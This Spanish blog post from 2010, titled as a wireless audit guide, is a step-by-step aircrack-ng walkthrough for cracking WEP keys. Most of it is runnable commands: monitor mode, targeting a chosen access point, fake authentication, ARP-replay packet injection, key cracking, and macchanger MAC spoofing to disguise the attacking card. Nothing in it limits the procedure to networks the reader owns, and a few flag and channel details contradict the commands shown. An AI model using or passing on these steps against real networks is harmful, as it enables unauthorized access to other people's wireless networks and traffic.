domingo, 15 de agosto de 2010

Auditar redes inalambricas

Testear contraseña: (wep, wpa y wpa2) Es necesario tener instalado el paquete "aircrack-ng" , para llego nos vamos a el Terminal de ubuntu y  utilizamos el siguiente comando :  $ sudo apt-get install aircrack-ng

Empezamos este manual utilizando el comando iwconfig En el cual nos mostrara las interfaces inalanbricas que tengamos instaladas.
Tenemos que desactivar la interfaz, para que posteriormente podamos ponerla en modo monitor con el comando :$ sudo airmon-ng stop wlan0
[wlan0] es el nombre de la interfaz de vuestra tarjeta wireless.
Mi interfaz se llama "wlan0"


Después activamos la tarjeta en modo monitor: $ sudo airmon-ng start wlan0
[wlan0] es  la interfaz de vuestra tarjeta wireless.

Luego de activar la interfaz vemos que el modo monitor se encuentra activado con el nombre mon0 , Ahora vamos a escanear las redes que tenemos a nuestro alcance, para eso usaremos airodump-ng, en el terminal escribe el siguiente comando: $ sudo airodump-ng mon0 
[mon0] Ojo,  ahora la se llama mon0, que es el nombre de la interfaz de vuestra tarjeta wireless en modo monitor.
mac (BSSID): 00:25:9C:CF:FC:16
canal (CH): 11
nombre (ESSID): _default

Abrirmos nuevo terminal y escribimos los datos del  otro terminal
$ sudo airodump-ng -c 11 --bssid 00:25:9C:CF:FC:16  -w captura mon0
-c es el canal de la red wireless, en mi caso es el canal 1
--bssid es la dirección mac del punto de acceso al que le queremos crackear
-w es el archivo donde se guardaran los paquetes, que posteriormente usaremos para crackear.

Nota: No cierres el terminal donde tengas puesto el airodump-ng, porque sino
dejara de sniffar los paquetes.

Ahora haremos una falsa autentificación, esto sirve para que el "Punto de Acceso" no rechaze los paquetes que inyectaremos posteriormente, Para ello usaremos $ sudo aireplay-ng -1 0 -e _default -a 00:25:9C:CF:FC:16 -h 00:11:22:33:44:55 mon0
-1 es el flag que usa para hacer la falsa autentificación,
 0 indica cada cuanto hace una falsa autentificación..
-e El nombre que tiene la red
-a La dirección mac del punto de acceso (BSSID)
-h La mac que queremos que quede asociada, es mejor poner una mac inventada
mon0 es la interfaz de nuestra tarjeta

Nota: si nos sale el mensaje "Waiting for beacon frame ...." Puede ser por la baja calidad de la wifi, es mejor cambiar los parámetros usando los siguientes: $ sudo aireplay-ng -1 6000 -o 1 -q 10 -e _default -a 00:25:9C:CF:FC:16 -h 00:11:22:33:44:55 mon0 

Ahora ya tenemos una dirección mac asociada con el "Punto de Acceso", debemos empezar a capturar paquetes, con el comando: $ sudo aireplay-ng -3 -b 00:25:9C:CF:FC:16 -h 00:11:22:33:44:55 mon0
-3 Este es el flag que usa aireplay para capturar y reenviar las peticiones ARP
-a Es la dirección mac del punto de acceso (BSSID)
-h La dirección mac que hemos asociado antes, ó alguna que ya estea asociada


Después de capturar más de 155.000 paquetes,  abrimos otro terminal y escribimos el comando: $ aircrack-ng -z *.cap
-z Activar un tipo de crackeo rápido
*.cap la ruta donde tengamos el archivo de captura, si estemos en el mismo directorio no ponemos ruta solo *.cap

Nota:  Wifi desde Consola
$ iwconfig
Habilitar la tarjeta de red:
$ sudo ifconfig wlan0 up
Buscar la red a la que queremos conectar :
$ iwlist wlan0 scan
Configurar la conexión a la red:
$ sudo iwconfig wlan0 essid ESSID key PASW
ESSID valor obtenido en el punto anterior. Recuerda ponerlo entre comillas si contiene espacios.
Ej.:"WLAN8 CASA" PASW Clave de nuestra red que debíamos tener previamente. 
Debe estar en hexadecimal.
Si esta en ASCII será necesario usar el prefijo "s" del siguiente modo: 
$ sudo iwconfig wlan0 essid ESSID key s:CONTRASEÑA
Obtener una IP dentro de la red 
$ sudo dhclient wlan0
Nota: Quiero saber quién usa mi red inalámbrica
sudo apt-get install nast
sudo nast -m -i wlan0

sudo nast -g (modo grafico)

Nota: Si queremos usar la misma mac del ataque en muestro equipo, escribimos los siguientes comandos antes de "$ sudo airodump-ng mon0"
$ sudo ifconfig mon0 down
$ sudo macchanger -m 00:11:22:33:44:55 mon0
$ sudo ifconfig mon0 up